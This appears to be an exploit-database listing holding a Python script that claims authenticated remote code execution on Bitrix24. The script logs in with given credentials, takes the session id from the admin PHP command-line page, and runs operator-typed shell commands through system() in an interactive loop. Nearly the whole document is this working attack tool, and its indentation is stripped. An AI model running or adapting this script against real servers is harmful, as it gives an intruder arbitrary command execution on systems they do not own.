Exploit for Bitrix24 Remtoe Code Execution

Name: Exploit for Bitrix24 Remtoe Code Execution
Rating: 5 (377 reviews)
2022-05-11 | CVSS -0.4
## https://sploitus.com/exploit?id=PACKETSTORM:167024
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)  
# Date: 4/22/2022  
# Exploit Author: picaro_o  
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php  
# Tested on: Linux os  
  
#/usr/bin/env python  
#Created by heinjame  
  
  
import requests  
import re  
from bs4 import BeautifulSoup  
import argparse,sys  
  
user_agent = {'User-agent': 'HeinJame'}  
  
parser = argparse.ArgumentParser()  
parser.add_argument("host", help="Betrix URL")  
parser.add_argument("uname", help="Bitrix Username")  
parser.add_argument("pass", help="Bitrix Password")  
pargs = parser.parse_args()  
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
  
inputcmd = input(">>")  
s = requests.Session()  
def login():  
  
postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}  
r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata)  
def getsessionid():  
sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",  
headers = user_agent)  
session = re.search(r"'bitrix_sessid':.*", sessionid.text)  
extract = session.group(0).split(":")  
realdata = extract[1].strip(" ")  
realdata = realdata.replace("'","")  
realdata = realdata.replace(",","")  
return realdata  
# print(r.text)  
def cmdline(cmd,sessionid):  
cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}  
usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers  
= user_agent, data = cmdline)  
soup = BeautifulSoup(usercmd.content,'html.parser')  
cmd = soup.find('p').getText()  
print(cmd.rstrip())  
login()  
sessionid = getsessionid()  
while inputcmd != "exit":  
cmdline(inputcmd,sessionid)  
inputcmd = input(">>")